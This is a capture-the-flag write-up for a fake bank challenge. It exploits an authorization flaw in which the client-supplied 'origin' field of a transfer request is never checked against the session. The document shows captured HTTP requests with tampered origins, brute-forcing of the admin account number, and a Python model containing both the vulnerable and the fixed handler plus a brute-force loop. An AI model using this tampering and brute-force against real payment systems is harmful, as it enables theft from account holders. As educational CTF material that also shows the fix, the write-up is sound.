Tags: misc 

Rating:

### Our bank app is secure because we run vulnerability scanners, get a transfer from the admin account!
Link: http://bank.eko.cap.tf:50000/

After creating an account and logging in, we see three tabs: Incoming Payments, Outcoming Payments and Transfer.
After firing up Burp Proxy and sending a transaction to `Juan Escobar - 4242`, we see the following request:

![](https://i.ibb.co/PFkVzwH/Screenshot-from-2020-09-27-16-54-00.png)

```
POST /transfer HTTP/1.1
Host: bank.eko.cap.tf:50000
Content-Length: 121
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://bank.eko.cap.tf:50000
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://bank.eko.cap.tf:50000/transfer
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: XSRF-TOKEN=eyJpdiI6Inoxby9ZanVvQzgyb1FoMGRpcm83dGc9PSIsInZhbHVlIjoiVlJ6Z3dSbXFDVzl6cmpHQzJJL0VBcGdmcWU3U0ZjU0Q5SFBvL3hBLzN5M3NhcVRiZ3ZmU1YwNkU5YzBrQ0Z4RkN6akJ4Wk94V2VZVkJiREQrSHlRS0M2OTVYb1VLRHoyQVIwdm9mVmhRUFZzSkNEMXJLRG13RFpISlBldzN5RVoiLCJtYWMiOiIwMzA5M2JlNjZhOGQyYzE5NDY2NWViMTNjZDRkN2Q0ZDAzNzIwZGE3ODYxNmZiOGViNTU5Y2M0YzNjMWM5M2Q4In0%3D; null_bank_session=eyJpdiI6IklUTWM3OXRraFJ0MlZSLzh0TENrclE9PSIsInZhbHVlIjoiOUhzZzFCVFBnNTRiZ3Y3VlkzRDVuNlZPRTlYZ0VsWHlIcFVEOE9BMWtYRlFhQmZ1a0xmd0RuQVVOTnhlc1R6SHhYNER0RHBCWGNBdk1JZ3ovWnNtdUxKbkFSRmd6VklXVTJOSjk3QWxOUFNzUW5nZ1FzL2VKcllQUTF5S2tGY3UiLCJtYWMiOiI1ODNkMjBlZTg3Y2UwYzgyY2EyYTQzOGE5YzhmNDdiNWE0ODc0MzM2Y2U5ODQ1MDU4ZDc0MmJhZmU2ZGNiNzBjIn0%3D
Connection: close

_token=5L7xtRsvngrOx8y3AaIzNhOTkjnHpqLgsUR18Nv4&origin=5686&destination=4242&bank=Banco+PUG&name=Juan+Escobar&amount=1&message=a
```

![Sent Money](https://i.ibb.co/VVYxb28/Screenshot-from-2020-09-27-13-32-37.png)

Notice the `origin` and `destination` fields? Both are plain form parameters, and the server never checks that the authenticated session actually owns the `origin` account. The session cookie and `_token` are our own, so we can replay this authenticated request with any `origin` we like and have money sent to ourselves. This is an authorization (business-logic) flaw, exactly the kind of thing a vulnerability scanner does not flag.

So let's repeat this request with `origin` and `destination` swapped, and voilà, it works! We've received money from account 4242.
![Received money](https://i.ibb.co/KbncCpC/Screenshot-from-2020-09-27-13-34-48.png)

Okay, so now we need to brute-force the admin's account number: replay the same request with each candidate as `origin` and our own account as `destination`, and watch the Incoming Payments tab.
I tried to brute-force the admin account in the ID range `4000` - `6000`, given the existing account numbers, with no luck. Then I completely randomly tried to send money from account number `1337` to my account and, boom, I received a payment from admin with the flag in the name. Should've brute-forced from 0.
```
POST /transfer HTTP/1.1
Host: bank.eko.cap.tf:50000
Content-Length: 121
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://bank.eko.cap.tf:50000
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://bank.eko.cap.tf:50000/transfer
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: XSRF-TOKEN=eyJpdiI6Inoxby9ZanVvQzgyb1FoMGRpcm83dGc9PSIsInZhbHVlIjoiVlJ6Z3dSbXFDVzl6cmpHQzJJL0VBcGdmcWU3U0ZjU0Q5SFBvL3hBLzN5M3NhcVRiZ3ZmU1YwNkU5YzBrQ0Z4RkN6akJ4Wk94V2VZVkJiREQrSHlRS0M2OTVYb1VLRHoyQVIwdm9mVmhRUFZzSkNEMXJLRG13RFpISlBldzN5RVoiLCJtYWMiOiIwMzA5M2JlNjZhOGQyYzE5NDY2NWViMTNjZDRkN2Q0ZDAzNzIwZGE3ODYxNmZiOGViNTU5Y2M0YzNjMWM5M2Q4In0%3D; null_bank_session=eyJpdiI6IklUTWM3OXRraFJ0MlZSLzh0TENrclE9PSIsInZhbHVlIjoiOUhzZzFCVFBnNTRiZ3Y3VlkzRDVuNlZPRTlYZ0VsWHlIcFVEOE9BMWtYRlFhQmZ1a0xmd0RuQVVOTnhlc1R6SHhYNER0RHBCWGNBdk1JZ3ovWnNtdUxKbkFSRmd6VklXVTJOSjk3QWxOUFNzUW5nZ1FzL2VKcllQUTF5S2tGY3UiLCJtYWMiOiI1ODNkMjBlZTg3Y2UwYzgyY2EyYTQzOGE5YzhmNDdiNWE0ODc0MzM2Y2U5ODQ1MDU4ZDc0MmJhZmU2ZGNiNzBjIn0%3D
Connection: close

_token=5L7xtRsvngrOx8y3AaIzNhOTkjnHpqLgsUR18Nv4&origin=1337&destination=4242&bank=Banco+PUG&name=admin&amount=1&message=a
```

![flag](https://i.ibb.co/0CNHSkG/Screenshot-from-2020-09-27-13-37-36.png)
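To make the two steps above concrete (swapping `origin`, then brute-forcing it), here is an added example that is not code from the original writeup or from the challenge. It models the `/transfer` endpoint in a few lines: the vulnerable handler trusts the client-supplied `origin`, the fixed one derives the debited account from the session, and a brute-force loop replays the captured request across a range of candidates. The ledger, account numbers, owner names and function names are all constructed assumptions chosen to mirror the writeup (us at 5686, Juan Escobar at 4242, admin at 1337).

```python
"""Added example, not part of the original writeup or the challenge.

Minimal model of the bank's /transfer endpoint: the vulnerable handler trusts
the client-supplied `origin`, the fixed one binds the debited account to the
authenticated session. A brute-force over candidate `origin` numbers shows why
the search has to start at 0. All data and names here are constructed.
"""
from dataclasses import dataclass, field


@dataclass
class Account:
    number: int
    owner: str                    # display name shown under "Incoming Payments"
    balance: int = 100
    incoming: list = field(default_factory=list)   # (origin, owner, amount, message)


def make_ledger():
    # Constructed sample data mirroring the writeup: us at 5686, Juan Escobar
    # at 4242, and an admin account at 1337 whose owner name carries the flag.
    return {
        5686: Account(5686, "us"),
        4242: Account(4242, "Juan Escobar"),
        1337: Account(1337, "admin EKO{example_flag}", balance=10**6),
    }


def _move(ledger, origin, destination, amount, message):
    """Debit `origin`, credit `destination`, record the payment for the receiver."""
    src, dst = ledger.get(origin), ledger.get(destination)
    if src is None or dst is None or amount <= 0 or src.balance < amount:
        return False
    src.balance -= amount
    dst.balance += amount
    dst.incoming.append((src.number, src.owner, amount, message))
    return True


def transfer_vulnerable(ledger, session_account, form):
    """Mirrors the bug: `origin` comes from the POST body and is never checked
    against the account owned by the logged-in session (`session_account`)."""
    return _move(ledger, int(form["origin"]), int(form["destination"]),
                 int(form["amount"]), form.get("message", ""))


def transfer_fixed(ledger, session_account, form):
    """Hardened handler: the debited account is always the session's own;
    a client-supplied `origin` that disagrees is rejected, not honoured."""
    if "origin" in form and int(form["origin"]) != session_account:
        return False
    return _move(ledger, session_account, int(form["destination"]),
                 int(form["amount"]), form.get("message", ""))


def bruteforce_origin(ledger, transfer, session_account, start, stop):
    """Replay the captured request with every candidate `origin`, sending 1 unit
    to our own account, and return the first origin whose payment shows up with
    the flag in the sender's name (None if no candidate in the range works)."""
    mine = ledger[session_account]
    for candidate in range(start, stop):
        if candidate == session_account:
            continue
        form = {"origin": candidate, "destination": session_account,
                "amount": 1, "name": "admin", "message": "a"}
        if transfer(ledger, session_account, form):
            _, owner, _, _ = mine.incoming[-1]
            if "EKO{" in owner:
                return candidate
    return None


if __name__ == "__main__":
    ledger = make_ledger()
    # Swapping origin/destination pulls money from Juan's account into ours.
    print(transfer_vulnerable(ledger, 5686, {"origin": 4242, "destination": 5686, "amount": 1}))
    # The range tried first in the writeup misses the admin account...
    print(bruteforce_origin(ledger, transfer_vulnerable, 5686, 4000, 6000))
    # ...while starting from 0 finds it at 1337.
    print(bruteforce_origin(ledger, transfer_vulnerable, 5686, 0, 6000))
    # The fixed handler refuses a foreign origin outright.
    print(transfer_fixed(ledger, 5686, {"origin": 4242, "destination": 5686, "amount": 1}))
```

The design point is in `transfer_fixed`: the account to debit is a property of the session, never of the request body, so there is nothing for the client to tamper with. Against the real target, the loop body would be the captured `POST /transfer` with the `Cookie` and `_token` values from your own session, and the check would be a fetch of the Incoming Payments page after each attempt.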

Flag: EKO{fr33_m0ney_c4ptain!}